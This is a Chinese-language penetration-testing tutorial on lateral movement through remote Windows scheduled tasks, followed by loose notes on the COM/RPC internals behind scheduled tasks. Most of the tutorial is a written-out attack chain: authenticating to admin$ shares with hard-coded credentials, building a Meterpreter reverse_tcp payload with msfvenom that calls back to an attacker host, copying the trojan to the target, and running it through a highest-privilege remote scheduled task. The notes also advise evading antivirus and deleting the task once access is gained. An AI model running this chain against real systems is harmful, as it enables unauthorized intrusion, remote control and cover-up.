横向移动:schtasks远程计划任务

视频教程:

横向移动手法介绍

拓扑图

执行的命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
net user administrator 123456
net user administrator qwe123!
net use \\192.168.123.67\admin$ /user:"administrator" 123456

win10提示:服务器没有配置远程管理的功能
win2008 命令成功完成
net use \\192.168.123.24\admin$ /user:"administrator" qwe123!
net time \\192.168.123.24 提示服务尚未启动
at \\192.168.123.24

生成木马
handler -H 192.168.123.138 -P 4444 -p windows/meterpreter/reverse_tcp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.123.138 LPORT=4444 -f exe -o payload.exe

上传木马
xcopy C:\Users\whale\Desktop\p\0404.exe \\192.168.123.24\admin$\temp\

调整字符集
chcp 437

创建计划任务
schtasks /create /s 192.168.123.24 /u "administrator" /p "qwe123!" /RL HIGHEST /F /tn "todayfive" /tr "C:/Windows/temp/0404.exe" /sc once /st 17:03:00

设置无论用户是否登陆,都执行计划任务

run whether user is logged on or not 

schtasks /create /s 192.168.123.24 /u "administrator" /p "qwe123!" /RL HIGHEST /F /tn "todayfive" /tr "C:/Windows/temp/0404.exe" /sc once /st 17:03:00 /NP


查看帮助
schtasks /create /?

执行计划任务
schtasks /run /tn todayfive /s 192.168.123.24 /U "administrator" /P "qwe123!"

查看运行状态
schtasks /query /s 192.168.123.24 /U "administrator" /P "qwe123!" | findstr "todayfive"

删除
schtasks /delete /F /tn todayfive /s 192.168.123.24 /U " administrator" /P "qwe123!"

在远程的目标机器上创建计划任务

  1. 被动密码搜集的方式
  2. 指定计划任务执行的时间
  3. exe免杀木马

注意:

  • win7以后使用schtasks命令,之前使用at命令
  • 应用场景:快速横向移动拿权限用的。
  • 非稳定控制的方式。需要自行免杀绕过av。
  • 拿到权限就删掉计划任务
  • 中文系统要调整字符集

2022.5.27 《关于计划任务的会议纪要》

一:计划任务API
计划任务的本质是xml
微软提供的计划任务是披着COM/DCOM皮的纯RPC
COM的简单用法,是什么 :直接调用RegisterTask

之前在做什么,直接抄别人的代码
天天用impacket,就是不去看源码
二:UAC?
RPC: 函数约定式调用(c)
COM;面向对象(C++)封装

com基础:CLSID
clsid一般指类标识符
代理模式

计划任务横向移动:
它的通信是加密的

武器化缺点

  1. 脱离实战照本宣科抄代码

什么是武器? 实战中不能掉链子
默认的缺点:1. 只有插电源的时候才启动计划任务
2. 默认一个计划任务只能跑3天

com和rpc的区别是什么?
DCOM和RPC的区别是什么
不要在不会、不了解的情况下,看不起传统的东西,而去追逐热点。